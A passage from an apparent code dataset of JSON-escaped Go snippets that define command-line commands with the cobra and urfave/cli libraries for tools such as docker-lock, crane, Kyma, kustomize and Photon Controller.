directory\",\n\t)\n\tgenerateCmd.Flags().String(\n\t\t\"config-file\", getDefaultConfigPath(),\n\t\t\"Path to config file for auth credentials\",\n\t)\n\tgenerateCmd.Flags().String(\n\t\t\"env-file\", \".env\", \"Path to .env file\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"dockerfile-env-build-args\", false,\n\t\t\"Use environment vars as build args for Dockerfiles\",\n\t)\n\treturn generateCmd\n}", "func NewCmd(name, fullName string) *cobra.Command {\n\treturn &cobra.Command{\n\t\tUse: name,\n\t\tShort: \"Print the version information\",\n\t\tLong: \"Print the version information\",\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tfmt.Printf(\"kam version %s\\n\", Version)\n\t\t},\n\t}\n}", "func NewCmd(use string) Builder {\n\treturn &builder{\n\t\tcmd: cobra.Command{\n\t\t\tUse: use,\n\t\t},\n\t}\n}", "func NewCmd(db *bolt.DB) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"card\",\n\t\tShort: \"Card operations\",\n\t\tExample: example,\n\t}\n\n\tcmd.AddCommand(cadd.NewCmd(db, os.Stdin), ccopy.NewCmd(db), cedit.NewCmd(db), cls.NewCmd(db), crm.NewCmd(db, os.Stdin))\n\n\treturn cmd\n}", "func newDestroyCmd() *cobra.Command {\n\tdc := &destroyCmd{}\n\n\tdestroyCmd := &cobra.Command{\n\t\tUse: \"destroy [-f SORUCE]\",\n\t\tShort: \"Destroy tau managed infrastructure\",\n\t\tLong: destroyLong,\n\t\tExample: destroyExample,\n\t\tDisableFlagsInUseLine: true,\n\t\tSilenceUsage: true,\n\t\tSilenceErrors: true,\n\t\tArgs: cobra.MaximumNArgs(0),\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tif err := dc.meta.init(args); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\treturn dc.run(args)\n\t\t},\n\t}\n\n\tf := destroyCmd.Flags()\n\tf.BoolVar(&dc.autoApprove, \"auto-approve\", false, \"auto approve destruction\")\n\n\tdc.addMetaFlags(destroyCmd)\n\n\treturn destroyCmd\n}", "func New(dir, name string, args ...string) Command {\n\tc := Command{}\n\n\tc.cmd = exec.Command(name, args...)\n\tc.cmd.Dir = dir\n\n\treturn c\n}", "func New(cmd string) *Cmd {\n\tvar args []string\n\tcmds, err := shellquote.Split(cmd)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tname := cmds[0]\n\tfor _, arg := range cmds[1:] {\n\t\targs = append(args, arg)\n\t}\n\treturn &Cmd{Name: name, Args: args}\n}", "func NewCmd(args ...interface{}) *redis.Cmd {\n\treturn redis.NewCmd(args...)\n}", "func newResourcesCmd() *cobra.Command {\n\tversionCmd := &cobra.Command{\n\t\tUse: \"resources\",\n\t\tShort: \"List Kubernetes API Resources\",\n\t\tExample: resourceExample,\n\t\tRunE: ResourcesCmd,\n\t}\n\n\treturn versionCmd\n}", "func NewCmd(octaviusDaemon daemon.Client, fileUtil file.File) *cobra.Command {\n\tvar metadataFilePath string\n\n\tcreateCmd := &cobra.Command{\n\t\tUse: \"create\",\n\t\tShort: \"Create new octavius job metadata\",\n\t\tLong: \"This command helps create new job metadata to your CP host with proper metadata.json file\",\n\t\tExample: fmt.Sprintf(\"octavius create --job-path <filepath>/metadata.json\"),\n\t\tArgs: cobra.MaximumNArgs(0),\n\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\n\t\t\tprinter.Println(\"Creating a new job.\", color.FgBlack)\n\t\t\tmetadataFileIoReader, err := fileUtil.GetIoReader(metadataFilePath)\n\t\t\tif err != nil {\n\t\t\t\tlog.Error(err, \"error in reading file\")\n\t\t\t\tprinter.Println(fmt.Sprintf(\"error in reading file %v\", err.Error()), color.FgRed)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tclient := &client.GrpcClient{}\n\t\t\tres, err := octaviusDaemon.Post(metadataFileIoReader, client)\n\t\t\tif err != nil {\n\t\t\t\tlog.Error(err, \"error in creating metadata\")\n\t\t\t\tprinter.Println(fmt.Sprintf(\"error in creating metadata, %v\", status.Convert(err).Message()), color.FgRed)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tlog.Info(fmt.Sprintf(\"%s job created\", res.Name))\n\t\t\tprinter.Println(fmt.Sprintf(\"%s job created\", res.Name), color.FgGreen)\n\t\t},\n\t}\n\tcreateCmd.Flags().StringVarP(&metadataFilePath, \"job-path\", \"\", \"\", \"path to metadata.json(required)\")\n\terr := createCmd.MarkFlagRequired(\"job-path\")\n\tif err != nil {\n\t\tlog.Error(err, \"error while setting the flag required\")\n\t\tprinter.Println(\"error while setting the flag required\", color.FgRed)\n\t\treturn nil\n\t}\n\treturn createCmd\n}", "func New(name string, pattern string, command string, args ...string) *Cmd {\n\treturn &Cmd{\n\t\tName: name,\n\t\tCommand: command,\n\t\tArgs: args,\n\t\tPattern: pattern,\n\t}\n}", "func NewGenerateCmd() (*cobra.Command, error) {\n\tgenerateCmd := &cobra.Command{\n\t\tUse: \"generate\",\n\t\tShort: \"Generate a Lockfile to track image digests\",\n\t\tPreRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\treturn bindPFlags(cmd, []string{\n\t\t\t\t\"base-dir\",\n\t\t\t\t\"dockerfiles\",\n\t\t\t\t\"composefiles\",\n\t\t\t\t\"kubernetesfiles\",\n\t\t\t\t\"lockfile-name\",\n\t\t\t\t\"dockerfile-globs\",\n\t\t\t\t\"composefile-globs\",\n\t\t\t\t\"kubernetesfile-globs\",\n\t\t\t\t\"dockerfile-recursive\",\n\t\t\t\t\"composefile-recursive\",\n\t\t\t\t\"kubernetesfile-recursive\",\n\t\t\t\t\"exclude-all-dockerfiles\",\n\t\t\t\t\"exclude-all-composefiles\",\n\t\t\t\t\"exclude-all-kubernetesfiles\",\n\t\t\t\t\"ignore-missing-digests\",\n\t\t\t\t\"update-existing-digests\",\n\t\t\t})\n\t\t},\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tflags, err := parseFlags()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tgenerator, err := SetupGenerator(flags)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tvar lockfileByt bytes.Buffer\n\n\t\t\terr = generator.GenerateLockfile(&lockfileByt)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tlockfileContents := lockfileByt.Bytes()\n\n\t\t\tif len(lockfileContents) == 0 {\n\t\t\t\treturn errors.New(\"no images found\")\n\t\t\t}\n\n\t\t\twriter, err := os.Create(\n\t\t\t\tflags.FlagsWithSharedValues.LockfileName,\n\t\t\t)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer writer.Close()\n\n\t\t\t_, err = writer.Write(lockfileContents)\n\t\t\tif err == nil {\n\t\t\t\tfmt.Println(\"successfully generated lockfile!\")\n\t\t\t}\n\n\t\t\treturn err\n\t\t},\n\t}\n\tgenerateCmd.Flags().String(\n\t\t\"base-dir\", \".\", \"Top level directory to collect files from\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"dockerfiles\", []string{}, \"Paths to Dockerfiles\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"composefiles\", []string{}, \"Paths to docker-compose files\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"kubernetesfiles\", []string{}, \"Paths to kubernetes files\",\n\t)\n\tgenerateCmd.Flags().String(\n\t\t\"lockfile-name\", \"docker-lock.json\",\n\t\t\"Lockfile name to be output in the current working directory\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"dockerfile-globs\", []string{}, \"Glob pattern to select Dockerfiles\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"composefile-globs\", []string{},\n\t\t\"Glob pattern to select docker-compose files\",\n\t)\n\tgenerateCmd.Flags().StringSlice(\n\t\t\"kubernetesfile-globs\", []string{},\n\t\t\"Glob pattern to select kubernetes files\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"dockerfile-recursive\", false, \"Recursively collect Dockerfiles\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"composefile-recursive\", false,\n\t\t\"Recursively collect docker-compose files\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"kubernetesfile-recursive\", false,\n\t\t\"Recursively collect kubernetes files\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"exclude-all-dockerfiles\", false,\n\t\t\"Do not collect Dockerfiles unless referenced by docker-compose files\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"exclude-all-composefiles\", false,\n\t\t\"Do not collect docker-compose files\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"exclude-all-kubernetesfiles\", false,\n\t\t\"Do not collect kubernetes files\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"ignore-missing-digests\", false,\n\t\t\"Do not fail if unable to find digests\",\n\t)\n\tgenerateCmd.Flags().Bool(\n\t\t\"update-existing-digests\", false,\n\t\t\"Query registries for new digests even if they are hardcoded in files\",\n\t)\n\n\treturn generateCmd, nil\n}", "func NewCmdImage(f kcmdutil.Factory, streams genericclioptions.IOStreams) *cobra.Command {\n\tcmd := set.NewCmdImage(f, streams)\n\tcmd.Long = setImageLong\n\tcmd.Example = setImageExample\n\tcmd.Flags().String(\"source\", \"docker\", \"The image source type; valid types are 'imagestreamtag', 'istag', 'imagestreamimage', 'isimage', and 'docker'\")\n\tset.ImageResolver = resolveImageFactory(f, cmd)\n\n\treturn cmd\n}", "func (c *Command) New() *cobra.Command {\n\tnewCommand := &cobra.Command{\n\t\tUse: \"annactl\",\n\t\tShort: \"Manage the API of the anna project. For more information see https://github.com/the-anna-project/annactl.\",\n\t\tLong: \"Manage the API of the anna project. For more information see https://github.com/the-anna-project/annactl.\",\n\t\tRun: c.Execute,\n\t}\n\n\tnewCommand.AddCommand(c.endpointCommand.New())\n\tnewCommand.AddCommand(c.versionCommand.New())\n\n\treturn newCommand\n}", "func NewCmd(o *Options) *cobra.Command {\n\n\tcmd := command{\n\t\tCommand: cli.Command{Options: o.Options},\n\t\topts: o,\n\t}\n\n\tcobraCmd := &cobra.Command{\n\t\tUse: \"deploy\",\n\t\tShort: \"Deploys Kyma on a running Kubernetes cluster.\",\n\t\tLong: \"Use this command to deploy, upgrade, or adapt Kyma on a running Kubernetes cluster.\",\n\t\tRunE: func(cc *cobra.Command, _ []string) error { return cmd.RunWithTimeout(cc.Context()) },\n\t\tAliases: []string{\"d\"},\n\t}\n\n\tcobraCmd.Flags().StringArrayVarP(&o.Components, \"component\", \"\", []string{}, `Provide one or more components to deploy, for example:\n\t- With short-hand notation: \"--component name@namespace\"\n\t- With verbose JSON structure \"--component '{\"name\": \"componentName\",\"namespace\": \"componentNamespace\",\"url\": \"componentUrl\",\"version\": \"1.2.3\"}'`)\n\tcobraCmd.Flags().StringVarP(&o.ComponentsFile, \"components-file\", \"c\", \"\", `Path to the components file (default \"$HOME/.kyma/sources/installation/resources/components.yaml\" or \".kyma-sources/installation/resources/components.yaml\")`)\n\tcobraCmd.Flags().StringVarP(&o.WorkspacePath, \"workspace\", \"w\", \"\", `Path to download Kyma sources (default \"$HOME/.kyma/sources\" or \".kyma-sources\")`)\n\tcobraCmd.Flags().StringVarP(&o.Source, \"source\", \"s\", config.DefaultKyma2Version, `Installation source:\n\t- Deploy a specific release, for example: \"kyma deploy --source=2.0.0\"\n\t- Deploy a specific branch of the Kyma repository on kyma-project.org: \"kyma deploy --source=<my-branch-name>\"\n\t- Deploy a commit (8 characters or more), for example: \"kyma deploy --source=34edf09a\"\n\t- Deploy a pull request, for example \"kyma deploy --source=PR-9486\"\n\t- Deploy the local sources: \"kyma deploy --source=local\"`)\n\tcobraCmd.Flags().StringVarP(&o.Domain, \"domain\", \"d\", \"\", \"Custom domain used for installation.\")\n\tcobraCmd.Flags().BoolVar(&o.DryRun, \"dry-run\", false, \"Alpha feature: Renders the Kubernetes manifests without actually applying them. The generated resources are not sufficient to apply Kyma to a cluster, because components having custom installation routines (such as Istio) are not included.\")\n\tcobraCmd.Flags().StringVarP(&o.Profile, \"profile\", \"p\", \"\",\n\t\tfmt.Sprintf(\"Kyma deployment profile. If not specified, Kyma uses its default configuration. The supported profiles are: %s, %s.\", profileEvaluation, profileProduction))\n\tcobraCmd.Flags().StringVarP(&o.TLSCrtFile, \"tls-crt\", \"\", \"\", \"TLS certificate file for the domain used for installation.\")\n\tcobraCmd.Flags().StringVarP(&o.TLSKeyFile, \"tls-key\", \"\", \"\", \"TLS key file for the domain used for installation.\")\n\tcobraCmd.Flags().IntVarP(&o.WorkerPoolSize, \"concurrency\", \"\", 4, \"Set maximum number of workers to run simultaneously to deploy Kyma.\")\n\tcobraCmd.Flags().StringSliceVarP(&o.Values, \"value\", \"\", []string{}, \"Set configuration values. Can specify one or more values, also as a comma-separated list (e.g. --value component.a='1' --value component.b='2' or --value component.a='1',component.b='2').\")\n\tcobraCmd.Flags().StringSliceVarP(&o.ValueFiles, \"values-file\", \"f\", []string{}, \"Path(s) to one or more JSON or YAML files with configuration values.\")\n\tcobraCmd.Flags().DurationVarP(&o.Timeout, \"timeout\", \"t\", 20*time.Minute, \"Maximum time for the deployment.\")\n\n\treturn cobraCmd\n}", "func NewCmd(cxt *command.Context) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"touch\",\n\t\tShort: \"Make the service catalog attempt to re-provision an instance\",\n\t\tExample: \"svcat touch instance wordpress-mysql-instance\",\n\t}\n\tcmd.AddCommand(newTouchInstanceCmd(cxt))\n\treturn cmd\n}", "func newCreateIdentityCmd(f cmdutil.Factory, out io.Writer, errOut io.Writer) *cobra.Command {\n\tnewOptions := func() *createIdentityOptions {\n\t\treturn &createIdentityOptions{\n\t\t\tedgeOptions: edgeOptions{\n\t\t\t\tCommonOptions: common.CommonOptions{Factory: f, Out: out, Err: errOut},\n\t\t\t},\n\t\t}\n\t}\n\n\tcmd := &cobra.Command{\n\t\tUse: \"identity\",\n\t\tShort: \"creates a new identity managed by the Ziti Edge Controller\",\n\t\tLong: \"creates a new identity managed by the Ziti Edge Controller\",\n\t}\n\n\tcmd.AddCommand(newCreateIdentityOfTypeCmd(\"device\", newOptions()))\n\tcmd.AddCommand(newCreateIdentityOfTypeCmd(\"user\", newOptions()))\n\tcmd.AddCommand(newCreateIdentityOfTypeCmd(\"service\", newOptions()))\n\n\treturn cmd\n}", "func NewCommand(out io.Writer, fs fs.FileSystem, rf *resmap.Factory, ptf transformer.Factory) *cobra.Command {\n\tops := NewCommandOptions()\n\n\tcmd := &cobra.Command{\n\t\tUse: \"build [path]\",\n\t\tShort: \"Print current configuration per contents of \" + constants.KustomizationFileName,\n\t\tExample: examples,\n\t\tSilenceUsage: true,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\terr := ops.Validate(args)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\treturn ops.Run(out, fs, rf, ptf)\n\t\t},\n\t}\n\n\tops.SetFlags(cmd.Flags())\n\n\treturn cmd\n}", "func New() *cobra.Command {\n\tzoneCmd.Flags().StringVarP(&br, \"bedroom\", \"b\", \"\", \"bedroom enabled (on/off)\")\n\tzoneCmd.Flags().StringVarP(&st, \"study\", \"s\", \"\", \"study enabled (on/off)\")\n\n\treturn zoneCmd\n}", "func NewCommand() (cmd *cobra.Command) {\n\tcmd = &cobra.Command{Use: \"binctl\", Run: func(cmd *cobra.Command, args []string) {\n\t\t//fmt.Println(\"Operate pipeline\")\n\t\t//fmt.Println(\"init binctl\")\n\t}}\n\tcmd.AddCommand(cmdMemory())\n\tcmd.AddCommand(cmdPipeline())\n\tcmd.PersistentFlags().String(\"config\", \"./configs/binlogo.yaml\", \"config file default is ./configs/binlogo.yaml\")\n\terr := viper.BindPFlag(\"config\", cmd.PersistentFlags().Lookup(\"config\"))\n\t// configs.InitViperFromFile(viper.GetString(\"config\"))\n\tconfigs.Init(viper.GetString(\"config\"))\n\t//etcd2.DefaultETCD()\n\tblog.Env(configs.Env(viper.GetString(\"env\")))\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\treturn\n}", "func NewCmd(o *Options) *cobra.Command {\n\tc := command{\n\t\tCommand: cli.Command{Options: o.Options},\n\t\topts: o,\n\t}\n\n\tcmd := &cobra.Command{\n\t\tUse: \"new-lambda\",\n\t\tShort: \"New local Lambda Function\",\n\t\tLong: `Creates a new local lambda function setup to start development`,\n\t\tRunE: func(_ *cobra.Command, args []string) error { return c.Run(args) },\n\t}\n\n\tcmd.Args = cobra.ExactArgs(1)\n\n\tcmd.Flags().StringVarP(&o.Namespace, \"namespace\", \"n\", \"default\", \"Namespace to bind\")\n\tcmd.Flags().BoolVar(&o.Expose, \"expose\", false, \"Create the namespace if not existing\")\n\tcmd.Flags().StringVar(&o.ClusterDomain, \"cluster-domain\", \"\", \"Cluster Domain of your cluster\")\n\n\treturn cmd\n}", "func newExportCfgsCmd() *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"export\",\n\t\tShort: \"Export the configurations of sources and tasks\",\n\t\tRunE: exportCfgsFunc,\n\t}\n\tcmd.Flags().StringP(\"dir\", \"d\", \"\", \"specify the configs directory, default is `./configs`\")\n\t_ = cmd.Flags().MarkHidden(\"dir\")\n\treturn cmd\n}", "func NewCmdFlatten(options *[]crane.Option) *cobra.Command {\n\tvar newRef string\n\n\tflattenCmd := &cobra.Command{\n\t\tUse: \"flatten\",\n\t\tShort: \"Flatten an image's layers into a single layer\",\n\t\tArgs: cobra.ExactArgs(1),\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\t// Pull image and get config.\n\t\t\tref := args[0]\n\n\t\t\t// If the new ref isn't provided, write over the original image.\n\t\t\t// If that ref was provided by digest (e.g., output from\n\t\t\t// another crane command), then strip that and push the\n\t\t\t// mutated image by digest instead.\n\t\t\tif newRef == \"\" {\n\t\t\t\tnewRef = ref\n\t\t\t}\n\n\t\t\t// Stupid hack to support insecure flag.\n\t\t\tnameOpt := []name.Option{}\n\t\t\tif ok, err := cmd.Parent().PersistentFlags().GetBool(\"insecure\"); err != nil {\n\t\t\t\tlog.Fatalf(\"flag problems: %v\", err)\n\t\t\t} else if ok {\n\t\t\t\tnameOpt = append(nameOpt, name.Insecure)\n\t\t\t}\n\t\t\tr, err := name.ParseReference(newRef, nameOpt...)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"parsing %s: %v\", newRef, err)\n\t\t\t}\n\n\t\t\tdesc, err := crane.Head(ref, *options...)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"checking %s: %v\", ref, err)\n\t\t\t}\n\t\t\tif !cmd.Parent().PersistentFlags().Changed(\"platform\") && desc.MediaType.IsIndex() {\n\t\t\t\tlog.Fatalf(\"flattening an index is not yet supported\")\n\t\t\t}\n\n\t\t\told, err := crane.Pull(ref, *options...)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"pulling %s: %v\", ref, err)\n\t\t\t}\n\n\t\t\tm, err := old.Manifest()\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"reading manifest: %v\", err)\n\t\t\t}\n\n\t\t\tcf, err := old.ConfigFile()\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"getting config: %v\", err)\n\t\t\t}\n\t\t\tcf = cf.DeepCopy()\n\n\t\t\toldHistory, err := json.Marshal(cf.History)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"marshal history\")\n\t\t\t}\n\n\t\t\t// Clear layer-specific config file information.\n\t\t\tcf.RootFS.DiffIDs = []v1.Hash{}\n\t\t\tcf.History = []v1.History{}\n\n\t\t\timg, err := mutate.ConfigFile(empty.Image, cf)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"mutating config: %v\", err)\n\t\t\t}\n\n\t\t\t// TODO: Make compression configurable?\n\t\t\tlayer := stream.NewLayer(mutate.Extract(old), stream.WithCompressionLevel(gzip.BestCompression))\n\n\t\t\timg, err = mutate.Append(img, mutate.Addendum{\n\t\t\t\tLayer: layer,\n\t\t\t\tHistory: v1.History{\n\t\t\t\t\tCreatedBy: fmt.Sprintf(\"%s flatten %s\", cmd.Parent().Use, desc.Digest),\n\t\t\t\t\tComment: string(oldHistory),\n\t\t\t\t},\n\t\t\t})\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"appending layers: %v\", err)\n\t\t\t}\n\n\t\t\t// Retain any annotations from the original image.\n\t\t\tif len(m.Annotations) != 0 {\n\t\t\t\timg = mutate.Annotations(img, m.Annotations).(v1.Image)\n\t\t\t}\n\n\t\t\tif _, ok := r.(name.Digest); ok {\n\t\t\t\t// If we're pushing by digest, we need to upload the layer first.\n\t\t\t\tif err := crane.Upload(layer, r.Context().String(), *options...); err != nil {\n\t\t\t\t\tlog.Fatalf(\"uploading layer: %v\", err)\n\t\t\t\t}\n\t\t\t\tdigest, err := img.Digest()\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Fatalf(\"digesting new image: %v\", err)\n\t\t\t\t}\n\t\t\t\tnewRef = r.Context().Digest(digest.String()).String()\n\t\t\t}\n\t\t\tif err := crane.Push(img, newRef, *options...); err != nil {\n\t\t\t\tlog.Fatalf(\"pushing %s: %v\", newRef, err)\n\t\t\t}\n\t\t\tdigest, err := img.Digest()\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"digesting new image: %v\", err)\n\t\t\t}\n\t\t\tfmt.Println(r.Context().Digest(digest.String()))\n\t\t},\n\t}\n\tflattenCmd.Flags().StringVarP(&newRef, \"tag\", \"t\", \"\", \"New tag to apply to flattened image. If not provided, push by digest to the original image repository.\")\n\treturn flattenCmd\n}", "func New(settings *environment.Settings) *cobra.Command {\n\treturn newCmd(settings, httpclient.New())\n}", "func NewCmd(cfg *CmdCfg) (Cmd, error) {\n\terr := validator.Validate(cfg)\n\tif err != nil {\n\t\treturn Cmd{}, errors.Wrap(err, \"error validating config\")\n\t}\n\tif cfg.Time.IsZero() {\n\t\tcfg.Time = time.Now().UTC()\n\t}\n\n\tid, err := uuid.NewRandom()\n\tif err != nil {\n\t\treturn Cmd{}, errors.Wrap(err, \"error generating event-id\")\n\t}\n\n\tvar dataBytes []byte\n\tswitch v := cfg.Data.(type) {\n\tcase []byte:\n\t\tdataBytes = v\n\tdefault:\n\t\tdataBytes, err = json.Marshal(cfg.Data)\n\t\tif err != nil {\n\t\t\treturn Cmd{}, errors.Wrap(err, \"error json-marshalling data\")\n\t\t}\n\t}\n\n\treturn Cmd{\n\t\tid: id.String(),\n\t\tcorrelationKey: cfg.CorrelationKey,\n\n\t\ttime: cfg.Time,\n\t\taction: cfg.Action,\n\t\tdata: dataBytes,\n\t}, nil\n}", "func newCmd(cmd string, arg ...string) *exec.Cmd {\n\tc := exec.Command(cmd, arg...)\n\tc.Stdout = os.Stdout\n\tc.Stderr = os.Stderr\n\treturn c\n}", "func NewCmd(o *cli.Options) *cobra.Command {\n\tcmd := &cobra.Command{\n\t\tUse: \"get\",\n\t\tShort: \"Gets Kyma-related resources.\",\n\t\tLong: \"Use this command to get Kyma-related resources.\",\n\t}\n\n\tcmd.AddCommand(schema.NewCmd(schema.NewOptions(o, os.Stdout, refMap)))\n\treturn cmd\n}", "func GetImagesCommand() cli.Command {\n\tcommand := cli.Command{\n\t\tName: \"image\",\n\t\tUsage: \"options for image\",\n\t\tSubcommands: []cli.Command{\n\t\t\t{\n\t\t\t\tName: \"create\",\n\t\t\t\tUsage: \"Create a new image\",\n\t\t\t\tArgsUsage: \"<image-filename>\",\n\t\t\t\tDescription: \"Upload a new image to Photon Controller.\\n\" +\n\t\t\t\t\t\" If the image replication is EAGER, it will be distributed to all allowed datastores on all ESXi hosts\\n\" +\n\t\t\t\t\t\" If the image replication is ON_DEMAND, it will be distributed to all image datastores\\n\" +\n\t\t\t\t\t\" An image can have project scope or infrastructure scope. Only system administrators can create\\n\" +\n\t\t\t\t\t\" infrastructure images.\\n\\n\" +\n\t\t\t\t\t\" Example:\\n\" +\n\t\t\t\t\t\" create image:\\n\" +\n\t\t\t\t\t\" photon image create kubernetes-1.6.ova -n kube-demo -i EAGER\",\n\t\t\t\tFlags: []cli.Flag{\n\t\t\t\t\tcli.StringFlag{\n\t\t\t\t\t\tName: \"name, n\",\n\t\t\t\t\t\tUsage: \"Image name\",\n\t\t\t\t\t},\n\t\t\t\t\tcli.StringFlag{\n\t\t\t\t\t\tName: \"image_replication, i\",\n\t\t\t\t\t\tUsage: \"Image replication type (EAGER or ON_DEMAND)\",\n\t\t\t\t\t},\n\t\t\t\t\tcli.StringFlag{\n\t\t\t\t\t\tName: \"scope, s\",\n\t\t\t\t\t\tUsage: \"Image scope (infrastructure/infra or project; default to project)\",\n\t\t\t\t\t},\n\t\t\t\t\tcli.StringFlag{\n\t\t\t\t\t\tName: \"project, p\",\n\t\t\t\t\t\tUsage: \"Project ID, required for image with project scope.\",\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\tAction: func(c *cli.Context) {\n\t\t\t\t\terr := createImage(c, os.Stdout)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlog.Fatal(\"Error: \", err)\n\t\t\t\t\t}\n\t\t\t\t},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: \"delete\",\n\t\t\t\tUsage: \"Delete an image\",\n\t\t\t\tArgsUsage: \"<image-id>\",\n\t\t\t\tDescription: \"Delete an image. All copies will be deleted.\\n\" +\n\t\t\t\t\t\" Please note that if the image is in use by one or more VMs, it will not be deleted until\\n\" +\n\t\t\t\t\t\" all VMs that use it are deleted\",\n\t\t\t\tAction: func(c *cli.Context) {\n\t\t\t\t\terr := deleteImage(c)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlog.Fatal(\"Error: \", err)\n\t\t\t\t\t}\n\t\t\t\t},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: \"list\",\n\t\t\t\tUsage: \"List images\",\n\t\t\t\tArgsUsage: \" \",\n\t\t\t\tFlags: []cli.Flag{\n\t\t\t\t\tcli.StringFlag{\n\t\t\t\t\t\tName: \"name, n\",\n\t\t\t\t\t\tUsage: \"Image name\",\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\tAction: func(c *cli.Context) {\n\t\t\t\t\terr := listImages(c, os.Stdout)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlog.Fatal(\"Error: \", err)\n\t\t\t\t\t}\n\t\t\t\t},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: \"show\",\n\t\t\t\tUsage: \"Show an image given it's ID\",\n\t\t\t\tArgsUsage: \"<image-id>\",\n\t\t\t\tAction: func(c *cli.Context) {\n\t\t\t\t\terr := showImage(c, os.Stdout)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlog.Fatal(\"Error: \", err)\n\t\t\t\t\t}\n\t\t\t\t},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: \"tasks\",\n\t\t\t\tUsage: \"Show image tasks\",\n\t\t\t\tArgsUsage: \"<image-id>\",\n\t\t\t\tFlags: []cli.Flag{\n\t\t\t\t\tcli.StringFlag{\n\t\t\t\t\t\tName: \"state, s\",\n\t\t\t\t\t\tUsage: \"Filter by task state\",\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\tAction: func(c *cli.Context) {\n\t\t\t\t\terr := getImageTasks(c)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tlog.Fatal(\"Error: \", err)\n\t\t\t\t\t}\n\t\t\t\t},\n\t\t\t},\n\t\t\t{\n\t\t\t\tName: \"iam\",\n\t\t\t\tUsage: \"options for identity and access management\",\n\t\t\t\tSubcommands: []cli.Command{\n\t\t\t\t\t{\n\t\t\t\t\t\tName: \"show\",\n\t\t\t\t\t\tUsage: \"Show the IAM policy associated with an image\",\n\t\t\t\t\t\tArgsUsage: \"<image-id>\",\n\t\t\t\t\t\tAction: func(c *cli.Context) {\n\t\t\t\t\t\t\terr := getImageIam(c)\n\t\t\t\t\t\t\tif err != nil {\n\t\t\t\t\t\t\t\tlog.Fatal(\"Error: \", err)\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t},\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\tName: \"add\",\n\t\t\t\t\t\tUsage: \"Grant a role to a user or group on an image\",\n\t\t\t\t\t\tArgsUsage: \"<image-id>\",\n\t\t\t\t\t\tDescription: \"Grant a role to a user or group on an image. \\n\\n\" +\n\t\t\t\t\t\t\t\" Example: \\n\" +\n\t\t\t\t\t\t\t\" photon image iam add <image-id> -p [email protected] -r contributor\\n\" +\n\t\t\t\t\t\t\t\" photon image iam add <image-id> -p photon.local\\\\group1 -r viewer\",\n\t\t\t\t\t\tFlags: []cli.Flag{\n\t\t\t\t\t\t\tcli.StringFlag{\n\t\t\t\t\t\t\t\tName: \"principal, p\",\n\t\t\t\t\t\t\t\tUsage: \"User or group\",\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\tcli.StringFlag{\n\t\t\t\t\t\t\t\tName: \"role, r\",\n\t\t\t\t\t\t\t\tUsage: \"'owner', 'contributor' and 'viewer'\",\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t},\n\t\t\t\t\t\tAction: func(c *cli.Context) {\n\t\t\t\t\t\t\terr := modifyImageIamPolicy(c, os.Stdout, \"ADD\")\n\t\t\t\t\t\t\tif err != nil {\n\t\t\t\t\t\t\t\tlog.Fatal(\"Error: \", 